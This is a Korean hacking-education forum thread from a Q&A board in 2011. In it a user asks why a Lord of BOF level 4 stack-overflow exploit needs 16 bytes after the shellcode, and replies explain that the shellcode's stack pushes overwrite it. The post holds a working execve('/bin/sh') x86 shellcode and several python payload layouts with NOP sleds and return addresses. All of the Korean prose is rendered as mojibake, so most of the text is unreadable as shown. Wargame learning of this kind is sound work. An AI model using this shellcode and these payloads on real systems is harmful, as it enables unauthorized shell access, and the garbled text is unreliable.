·¹º§ ÇØÅ·

 2844, 7/143 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   incaro
   LOB Áú¹®]] ¿Ö! 16ByteÀÌ¿©¾ß Çϴ°¡.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=3213 [º¹»ç]


*LOB ¹®Á¦4¿¡¼­ BUFFER°¡ [40Byte]ÀÌ°í, ÀϹÝÀûÀÎ ¹öÆÛ ¿À¹öÇÃ·Î¿ì ¹æ½ÄÀ¸·Î ¼ÐÄڵ带 »ðÀÔÇÏ¿©
¹®Á¦¸¦ Ç®¾úÀ»¶§  ´ÙÀ½°ú °°Àº »çÇ×ÀÌ Àִµ¥¿ä.



±Ã±ÝÇÑ°Í Çϳª)
¾Æ·¡¿Í °°ÀÌ ¼ÐÄÚµå ¿À¸¥ÂÊ ¾î¶°ÇÑ °ª(¿¹:NOP)À» ä¿ï¶§
ÇÑ°¡Áö Á¶°ÇÀÌ ²À µÚ¿¡´Â 16Byte ÀÌ»ó µÇ¾ß ÇÑ´Ù´Â °ÍÀÔ´Ï´Ù.
* ¨ë, ¨ì ¹ø°ú °°ÀÌ ¼ÐÄÚµå ¿À¸¥ÂÊ¿¡ 16ByteÀ϶§¸¸ Á¤»óÀûÀ¸·Î ¼Ð±ÇÇÑÀ» µû³¾¼ö ÀÖ¾ú½À´Ï´Ù..
___________________________________________________________
¨ç[NOP*20] + [¼ÐÄÚµå] + [RET]                        (X)
$(python -c 'print "\x90"*20 + "¼ÐÄÚµå" + "RET ÁÖ¼Ò"')
¨è[NOP*16] + [¼ÐÄÚµå] + [NOP*4] + [RET]         (X)
$(python -c 'print "\x90"*16 + "¼ÐÄÚµå" + "\x90"*4 + "RET ÁÖ¼Ò"')
¨é[NOP*12] + [¼ÐÄÚµå] + [NOP*8] + [RET]         (X)
$(python -c 'print "\x90"*12 + "¼ÐÄÚµå" + "\x90"*8 + "RET ÁÖ¼Ò"')
¨ê[NOP*8]  + [¼ÐÄÚµå]  + [NOP*12] + [RET]       (X)
$(python -c 'print "\x90"*8 + "¼ÐÄÚµå" + "\x90"*12 + "RET ÁÖ¼Ò"')
¨ë[NOP*4]  + [¼ÐÄÚµå]  + [NOP*16] + [RET]       (O)
$(python -c 'print "\x90"*4 + "¼ÐÄÚµå" + "\x90"*16 + "RET ÁÖ¼Ò"')
¨ì[¼ÐÄÚµå]  + [NOP*20] + [RET]                       (O)
$(python -c 'print "¼ÐÄÚµå" + "\x90"*20 + "RET ÁÖ¼Ò"')
___________________________________________________________
»ç¿ëÇÑ ¼ÐÄÚµå :
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
___________________________________________________________
[BUFFER (40Byte)] + [EBP(4Byte)] + [RET (4Byte)]
[          NOP + ¼ÐÄڵ堠+ NOP  +  RETÁÖ¼Ò       ]
-----------------------------------------------------------

±Ã±ÝÇÑ°Í µÎ¿ï)
*±×·¯³ª À§Ã³·³ NOP ½ä¸Å¸¦ ¾²Áö ¾Ê°í ¿µ¹®ÀÚ ½ºÆ丵µµ µÇ´õ±º¿ä.
¿¹ )
             ["A"*4]  + [¼ÐÄÚµå]  + ["A"*16] + [RET]         (O)
             ["B"*4]  + [¼ÐÄÚµå]  + ["B"*16] + [RET]         (O)
             ["C"*4]  + [¼ÐÄÚµå]  + ["C"*16] + [RET]         (O)
             [¼ÐÄÚµå]  + ["Z"*20] + [RET]                        (O)
------------------------------------------------------------------------------------
(¡Ø. LOB¹®Á¦4¿¡¼­¸¸ ±×·±°ÍÀº ¾Æ´Õ´Ï´Ù.)


±×·¯³ª Á¤È®ÇÑ ÀÌÀ¯¸¦ ¸ð¸£°Ú³×¿ä!
ÁÁÀº ´äº¯ ±â´Ù¸³´Ï´Ù.  ÁÁÀº ÇÏ·ç µÇ¼¼¿ä^^



  Hit : 3078     Date : 2011/06/01 06:30



    
¸Û¸Û Áú¹® ÀÌÇØ ºÒ°¡.. Á˼ÛÇÕ´Ï´Ù 2011/06/02  
incaro Á˼ÛÇÕ´Ï´Ù ³Ê¹« µÎ¼­ ¾øÀÌ Áú¹®À» µå·È³×¿ä.
¼öÁ¤ÇÏ¿´½À´Ï´Ù.
2011/06/02  
º°ºûÀ»´ã¾Æ dummy ºÎºÐÀÌ À־ ±×·±°Å ¾Æ´Ñ°¡¿ä? ¤·¤µ¤·
LOBºÎÅÍ´Â FTZ¿Í ´Ù¸£°Ô dummy°¡ ÀÖ´Ù°í µéÀº°Å °°Àºµ¥ ¸»ÀÌÁÒ;
2011/06/03  
incaro ±×¹Ý´ë·Î FTZ´Â dummy°¡ ÀÖ°í
LOB´Â gcc version egcs-2.91.66 ·Î ´õ¹Ì°¡ ¾ø½À´Ï´Ù.
Àú ±ÔÄ¢À» ¸ð¸£°Ú³×¿ä ;; ¾Æ½Ã´ÂºÐ ¤Ì¤Ì ´äº¯Á» ºÎŹµå·Á¿ä
2011/06/03  
guswns0528 shellcode°¡ ½ÇÇàµÇ¸é¼­ ´ëºÎºÐ ÀÎÀÚ¸¦ ³Ñ±â±â À§Çؼ­ esp¸¦ º¯°æÇÕ´Ï´Ù. À̶§ esp°¡ ¹Ù²î´Â ¹æÇâÀº stackÀÌ ÀÚ¶ó´Â ¹æÇâÀε¥ push¸í·ÉÀ̳ª mov¸í·ÉÀ¸·Î °ªÀ» ¾²°Ô µÇ¸é shellcode¸¦ µ¤¾î¾¹´Ï´Ù. ±×·¡¼­ ½©Äڵ尡 ½ÇÇàµÇ´Ù°¡ illeagal instructionÀ̳ª segfault°¡ ³ª°Ô µË´Ï´Ù. 2011/06/07  
incaro ´äº¯ °¨»çµå·Á¿ä. 2011/06/09  
¸Û¸Û guswns0528´Ô ´äº¯ÀÌ Á¤È®Çϳ׿ä~ 2011/07/04  
2724   LOB FC4 ŸÀÌź ¤Ð¤Ð [3]     ¿ìÀ×22
07/17 3317
2723   webhacking.kr 21¹ø ¹®Á¦[1]     jaewonm
07/11 5836
2722   [lord of bof FC4] titan Áú¹®ÀÖ½À´Ï´Ù!!!!!! Á¦¹ß[3]     ¿ìÀ×22
07/04 3479
2721   level11->level12 ¿¡¼­ ¸·Èü´Ï´Ù. ÇÏ·çÁ¾ÀÏ À̰Ÿ¸ º¸³×¿ä.....[6]     ozdang
07/01 2331
2720   [LOB] LEVEL16 - FAKE EBP ¹®Á¦ Áú¹®.[3]     incaro
06/11 2921
2719   Level 1¿¡¼­ level2 ±ÇÇÑ¿¡ ´ëÇÑ Áú¹®[3]     yootaeil
06/09 2915
2718   lob fc4 Enimga ³Ê¹« ¾î·Á¿ö¿ä ~!!!     ¿ìÀ×22
06/02 3099
  LOB Áú¹®]] ¿Ö! 16ByteÀÌ¿©¾ß Çϴ°¡.[7]     incaro
06/01 3077
2716   webhacking.kr ¼Ò½ºº¸°í³ª¼­[1]     Ǭ¼ö¿ÕÀÚ
06/01 2507
2715   LOB Áú¹® µå·Á¿ä. (BASH2)[1]     incaro
05/23 3624
2714   LOB FC4°¡ ¶ÇÀÖ³ª¿ä?     chofly
05/22 2558
2713   LOB FC4 enigma ÈùÆ® Á» ÁÖ¼¼¿ä     ¿ìÀ×22
05/17 3965
2712   [¹®Á¦ Level11]¾î¶²½©ÄÚµå´ÂµÇ°í ¾î¶²°Ç ¾ÈµÇ°í... ÇÞ°¥¸®³×¿ä..[2]     incaro
05/16 3089
2711   µµ´ëü... Level11Àº level10°ú ¿ÖÀÌ·¸°Ô Áö½ÄÂ÷ÀÌ°¡ ³ª´Â°ÅÁÒ;[1]     darkofgy
05/15 2556
2710   LOB ½ÃÀÛÇߴµ¥¿ä ...[4]     w7040
05/08 2420
2709   Level8 ±×³É Çѹø °í¹ÎÇß´ø°É ¾ê±âÇغ¾´Ï´Ù     ÀÌÇö¹è
04/29 2299
2708   ·¹º§ 5->·¹º§6 °úÁ¤¿¡¼­ suid°¡ ÇØÁ¦µÇ¾îÀÖ½À´Ï´Ù..[4]     traciare
04/28 2310
2707   FC3¿¡¼­ GOT¿À¹ö¶óÀÌÆà Áú¹®ÀÖ½À´Ï´Ù..,[2]     ¿ìÀ×22
04/25 3761
2706   lob fc3 fgets·Î ÀԷ¹޴ ¿À¹öÇ÷οì°ü·Ã Áú¹®ÀÖ½À´Ï´Ù.[3]     ¿ìÀ×22
04/14 4257
2705   ftz ¸¦ ÇÏ´Ù°¡ ¸®´ª½º¸¦ ±ò¾Æ¤²¤È¤µ´Âµ¥ [3]     yangseungjin
04/11 2571
[1][2][3][4][5][6] 7 [8][9][10]..[143]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org